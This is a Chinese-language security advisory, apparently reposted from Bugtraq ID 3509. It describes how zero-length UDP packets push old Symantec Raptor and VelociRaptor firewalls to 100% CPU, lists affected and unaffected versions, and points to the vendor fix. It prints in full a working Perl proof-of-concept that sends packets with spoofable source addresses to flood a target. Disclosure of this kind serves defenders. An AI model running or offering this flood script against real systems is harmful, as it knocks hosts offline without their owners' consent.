发布日期：2001-11-05
更新日期：2001-11-08

受影响系统：

Symantec Raptor Firewall 4.0.0 HP-UX
   - HP HP-UX 10.20
Symantec Raptor Firewall 5.0.3 Windows NT
Symantec Raptor Firewall 6.0.2 Windows NT
   - Microsoft Windows NT 4.0
Symantec Raptor Firewall 6.0.2 Solaris
   - Sun Solaris 2.6
Symantec Raptor Firewall 6.0.3 HP-UX
   - HP HP-UX 11.0
Symantec Raptor Firewall 6.5 Windows NT
   - Microsoft Windows NT 4.0
Symantec VelociRaptor 1.1,
Symantec VelociRaptor 1.0

不受影响系统：

Symantec Enterprise Firewall 6.5.2 NT/2000
Symantec Raptor Firewall 6.5.1 Solaris
   - Sun Solaris 2.6
   - Sun Solaris 7.0
Symantec Raptor Firewall 6.5.3 Solaris
   - Sun Solaris 2.6
   - Sun Solaris 7.0

描述：

---

BUGTRAQ ID: 3509

Raptor Firewall 是一款商业防火墙产品，是由Symantec 公司发布的。该软件存在一
个安全问题，可能导致资源耗尽。

通过发送零长度的UDP包到该防火墙，可以导致CPU占用率100%，放置该防火墙的主机速
度变慢。

<*来源：Max Moser （mmo@phase1.ch）
  链接：http://www.remote-exploit.org/downloads.php
*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Max Moser （mmo@phase1.ch）提供了如下测试程序：
#!/usr/bin/perl
###################################
# This Code is for education only #
###################################
# Greetings to kitchen from #perl on irc openproject.net
# For the help on some perl questions.
# Firewalls are hard on the outside and crunchy on the inside
#
# The Rapor Firewall UDP-GSP (UDP-Proxy) gets 100% CPU load
# When getting UDP-Packets with no Data init
#
# Written 21.Jun 2001 by Max Moser mmo@remote-exploit.org
#
# http://www.remote-exploit.org
#

use Net::RawIP;
use Getopt::Long;

GetOptions('src=s','dst=s','num=i');

if (!$opt_src | !$opt_dst | !$opt_num ){
    print "\nUsage parameters for ".$0.":\n";
    print "\t--src\t IP-Sourceaddress\n";
    print "\t--dst\t IP-Destinationaddress\n";
    print "\t--num\t Numer of UDP packets to send\n";
    print "\nExample:\n";
    print "\t".$0." --src=192.168.0.1 --dst=192.168.0.354 --num=1000\n\n\n";
    exit(1);
};

# Some defines
$| = 1;
@anim= ("\\","|","/","-","\\","|","/","-");
$source=$opt_src;
$destination=$opt_dst;
$numpack=$opt_num;

print "\n\n\tSending packets now  ";
for($x=0;$x<$numpack;$x=$x+1){
    my $sport=(rand(65534)+1);
    my $dport=(rand(1024)+1);
    my $c=new Net::RawIP({udp=>{source=>$sport,dest=>$dport}});
        $c->set({ip=>{saddr=>$source,daddr=>$destination},{udp}});
        $c->send;
        undef $c;
    for ($y=0;$y<8;$y=$y+1){
        print "\b" . $anim[$y];
        select (undef,undef,undef,0.01);
        if ($y==8){ $y=0};      
    };
};

print "\n\n\nSuccessfully sent ".$numpack." packets to ". $destination . "\n\n";



建议：

---

厂商补丁：

我们建议使用此软件的用户到厂商的主页获取不存在该问题的版本：
all.html>http://www.symantec.com/techsupp/ent/raptor_firewall/files_raptor_firew
all.html

浏览次数：6081
严重程度：0（网友投票）